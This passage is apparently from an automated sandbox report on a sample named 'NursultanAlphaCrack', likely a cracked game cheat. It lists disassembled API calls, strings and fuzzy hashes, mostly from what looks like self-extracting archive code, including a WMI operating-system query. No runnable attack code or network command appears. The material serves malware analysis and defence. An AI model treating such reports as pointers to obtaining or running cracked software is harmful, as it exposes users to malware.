                                                                                          • Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370
                                                                                        • EndDialog.USER32(?,00000001), ref: 001DB610
                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 001DB637
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001DB650
                                                                                        • SetWindowTextW.USER32(?,?), ref: 001DB661
                                                                                        • GetDlgItem.USER32(?,00000065), ref: 001DB66A
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001DB67E
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001DB694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                        • String ID: LICENSEDLG
                                                                                        • API String ID: 3214253823-2177901306
                                                                                        • Opcode ID: fc9ea7676d05eec713167e17d8669fd759c277143e07ca48e014044d89ac98fd
                                                                                        • Instruction ID: 4fba6f6f379ff3ccb4ba92b6df19c70d86ef77725cc578f24a1528be811a049b
                                                                                        • Opcode Fuzzy Hash: fc9ea7676d05eec713167e17d8669fd759c277143e07ca48e014044d89ac98fd
                                                                                        • Instruction Fuzzy Hash: BC21B432208214FBD2219FA6FD8DF7B3B7DEB56B41F024016FA05922A0CF56DA029671
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,CA70C7D0,00000001,00000000,00000000,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFD99
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFE14
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 001DFE1F
                                                                                        • _com_issue_error.COMSUPP ref: 001DFE48
                                                                                        • _com_issue_error.COMSUPP ref: 001DFE52
                                                                                        • GetLastError.KERNEL32(80070057,CA70C7D0,00000001,00000000,00000000,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFE57
                                                                                        • _com_issue_error.COMSUPP ref: 001DFE6A
                                                                                        • GetLastError.KERNEL32(00000000,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFE80
                                                                                        • _com_issue_error.COMSUPP ref: 001DFE93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 1353541977-0
                                                                                        • Opcode ID: ba7354d4c061ea6de4211313a14ef54432d1b583ef615aa40e1002548aded977
                                                                                        • Instruction ID: d3b2b3fdc9d79bd9b6f83bfe52342656f2998c59b25609bfb7f3d7fc52bec348
                                                                                        • Opcode Fuzzy Hash: ba7354d4c061ea6de4211313a14ef54432d1b583ef615aa40e1002548aded977
                                                                                        • Instruction Fuzzy Hash: 22410871A00219AFCB109FA8CC45BAEBBA8EF44710F14423FF916E7391D7349A41C7A4
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                        • API String ID: 3519838083-3505469590
                                                                                        • Opcode ID: 5f94c2ba5cd16d22c4e9f92e26089b9e1f50e0a379ef7d047a1cb1166a03727c
                                                                                        • Instruction ID: 3d77c4c9ed07eb4fa68db5b916f874b3b8514ab9144efdb450b4092f9400d185
                                                                                        • Opcode Fuzzy Hash: 5f94c2ba5cd16d22c4e9f92e26089b9e1f50e0a379ef7d047a1cb1166a03727c
                                                                                        • Instruction Fuzzy Hash: 5A713770A00219AFDB15DFA4C895EBEBBB9FF58714B14015DE512E72A0CB30AE42CB60
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C9387
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001C93AA
                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001C93C9
                                                                                          • Part of subcall function 001CC29A: _wcslen.LIBCMT ref: 001CC2A2
                                                                                          • Part of subcall function 001D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001CC116,00000000,.exe,?,?,00000800,?,?,?,001D8E3C), ref: 001D1FD1
                                                                                        • _swprintf.LIBCMT ref: 001C9465
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 001C94D4
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 001C9514
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: rtmp%d
                                                                                        • API String ID: 3726343395-3303766350
                                                                                        • Opcode ID: 5849ff60792b66af91a4ab93b3aa74df2a8f7fb61630908c98d9722e758ff8f8
                                                                                        • Instruction ID: b68bd7502e9fdc21607f03bd6b2fee7b1584f13a7da02e62946a2428097d07fb
                                                                                        • Opcode Fuzzy Hash: 5849ff60792b66af91a4ab93b3aa74df2a8f7fb61630908c98d9722e758ff8f8
                                                                                        • Instruction Fuzzy Hash: 204143B190025866DF21EBA0CD59FEE737CAF75740F0048AAB649E3151DB38DB89CB60
                                                                                        APIs
                                                                                        • __aulldiv.LIBCMT ref: 001D122E
                                                                                          • Part of subcall function 001CB146: GetVersionExW.KERNEL32(?), ref: 001CB16B
                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 001D1251
                                                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 001D1263
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001D1274
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1284
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1294
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001D12CF
                                                                                        • __aullrem.LIBCMT ref: 001D1379
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                        • String ID:
                                                                                        • API String ID: 1247370737-0
                                                                                        • Opcode ID: 97c58f88878647e37397f82ed2da0ff59f1029c3483aefe7fbfb856e5fb123c3
                                                                                        • Instruction ID: 4c6b702c7f1a8f9e2a986a6e2ebd1c684eff9b8e488756674dd6ea95b988c458
                                                                                        • Opcode Fuzzy Hash: 97c58f88878647e37397f82ed2da0ff59f1029c3483aefe7fbfb856e5fb123c3
                                                                                        • Instruction Fuzzy Hash: 2041F5B2508305AFC710DF65C88496BFBE9FF88714F14892EF59AC2610E734E649CB52
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 001C2536
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                          • Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                        • API String ID: 3053425827-2277559157
                                                                                        • Opcode ID: 8bee50d37da4257b3d700d3706946796f100aa975451be57f6efd9835f15583a
                                                                                        • Instruction ID: 7f729bf0a1c91ce104885a1102b74ac5fd717672b9fbd33c8b56679dbc9e339b
                                                                                        • Opcode Fuzzy Hash: 8bee50d37da4257b3d700d3706946796f100aa975451be57f6efd9835f15583a
                                                                                        • Instruction Fuzzy Hash: 28F1F5706083819BDB25EB2884A5FFE77D56BB4300F08056DED8A9B283CB74DD45C7A6
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                                                        • API String ID: 176396367-3568243669
                                                                                        • Opcode ID: fcbd1aafbfec6e0380b4f964687a894977e829515dd0a9aa3df2710350733075
                                                                                        • Instruction ID: 4dd631fd2ffe2ad311c98b9deb225803dab517e052aa902f2ec36d6b8e266dd0
                                                                                        • Opcode Fuzzy Hash: fcbd1aafbfec6e0380b4f964687a894977e829515dd0a9aa3df2710350733075
                                                                                        • Instruction Fuzzy Hash: AC512966740763A5DB309AA99C1177773E2DFA5750F69042BFDC1CB3C0FB658C818261
                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,001EFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 001EF6CF
                                                                                        • __fassign.LIBCMT ref: 001EF74A
                                                                                        • __fassign.LIBCMT ref: 001EF765
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 001EF78B
                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,001EFE02,00000000,?,?,?,?,?,?,?,?,?,001EFE02,00000000), ref: 001EF7AA
                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,001EFE02,00000000,?,?,?,?,?,?,?,?,?,001EFE02,00000000), ref: 001EF7E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: 4bd33dccc291c326ad90d0a408ded8dc21116499dcfd9e23e312939940867caa
                                                                                        • Instruction ID: eaab18de7bf107e5fe466761b965602fb271cbcefaeaffc16a3ca5466f947a40
                                                                                        • Opcode Fuzzy Hash: 4bd33dccc291c326ad90d0a408ded8dc21116499dcfd9e23e312939940867caa
                                                                                        • Instruction Fuzzy Hash: AB51C5B5D00649AFDB10CFA9DC55AEEBBF4EF08700F14416EE955E7251D730AA41CBA0
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 001E2937
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 001E293F
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 001E29C8
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 001E29F3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 001E2A48
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 398d70fc80a67ef9359e75d6aa61b3d14898c8356e8fec8a31785793c61abf9a
                                                                                        • Instruction ID: 69cff47a88a61fe31a3fbf146c820ff3797cb9a515b4746c4bd7658f2688c849
                                                                                        • Opcode Fuzzy Hash: 398d70fc80a67ef9359e75d6aa61b3d14898c8356e8fec8a31785793c61abf9a
                                                                                        • Instruction Fuzzy Hash: F6411B30A006989FCF14DF6AC895AAE7BF9EF44318F148065E8159B393C771DA41CF91
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,00000000), ref: 001D9EEE
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 001D9F44
                                                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 001D9FDB
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 001D9FE3
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 001D9FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$RectText
                                                                                        • String ID: RarHtmlClassName
                                                                                        • API String ID: 3937224194-1658105358
                                                                                        • Opcode ID: 16c215892be61248e6095557a0f2e37166750d4a57e4fa67ae5d8bf7b5360b49
                                                                                        • Instruction ID: d7382cdf434c7cb615749fdb3d1f2f8828613079955d6cdea89b9ec10493e543
                                                                                        • Opcode Fuzzy Hash: 16c215892be61248e6095557a0f2e37166750d4a57e4fa67ae5d8bf7b5360b49
                                                                                        • Instruction Fuzzy Hash: 1B41C032004210BFDB219FA4EC4CB2B7FA8FF48701F00455AF949AA266DB38D919CF65
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                        • API String ID: 176396367-3743748572
                                                                                        • Opcode ID: 3acd1f12c111d3e119a0b3b7f6b695b9d4423e616986e3125c697def43f119bf
                                                                                        • Instruction ID: b1d09ab30d1682dc41d1a84b2bde960b7de88d19fd7f6962c071ad0b27365ed2
                                                                                        • Opcode Fuzzy Hash: 3acd1f12c111d3e119a0b3b7f6b695b9d4423e616986e3125c697def43f119bf
                                                                                        • Instruction Fuzzy Hash: 60319E7364475566DA34AF959C42B7F73E4EBA0720F60841FF996873C0FBA0AD4183A1
                                                                                        APIs
                                                                                          • Part of subcall function 001EC868: _free.LIBCMT ref: 001EC891
                                                                                        • _free.LIBCMT ref: 001EC8F2
                                                                                          • Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
                                                                                          • Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4
                                                                                        • _free.LIBCMT ref: 001EC8FD
                                                                                        • _free.LIBCMT ref: 001EC908
                                                                                        • _free.LIBCMT ref: 001EC95C
                                                                                        • _free.LIBCMT ref: 001EC967
                                                                                        • _free.LIBCMT ref: 001EC972
                                                                                        • _free.LIBCMT ref: 001EC97D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                        • Instruction ID: 8d9e75780ef0033f2ae2d600ba0cea8979e9494afc2c6f04e270f62f9326865c
                                                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                        • Instruction Fuzzy Hash: 42112171580F84AAE520B7B3CD07FCF7BACAF24B00F444C15B29D66092DB75B5068790
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,001DE669,001DE5CC,001DE86D), ref: 001DE605
                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001DE61B
                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001DE630
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                        • API String ID: 667068680-1718035505
                                                                                        • Opcode ID: 82b597fdcc65f910713df66573280566baba547b658171f91dff71209bb2209f
                                                                                        • Instruction ID: 38ced9efe11c5406813955f9704c869997aedf02e5b973ce145544de55c1673f
                                                                                        • Opcode Fuzzy Hash: 82b597fdcc65f910713df66573280566baba547b658171f91dff71209bb2209f
                                                                                        • Instruction Fuzzy Hash: D8F0F6357812226B4F316FB46C8897622C96A35753B05053BFA06DF710EB10CC659B91
                                                                                        APIs
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001D14C2
                                                                                          • Part of subcall function 001CB146: GetVersionExW.KERNEL32(?), ref: 001CB16B
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001D14E6
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 001D1500
                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001D1513
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1523
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001D1533
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
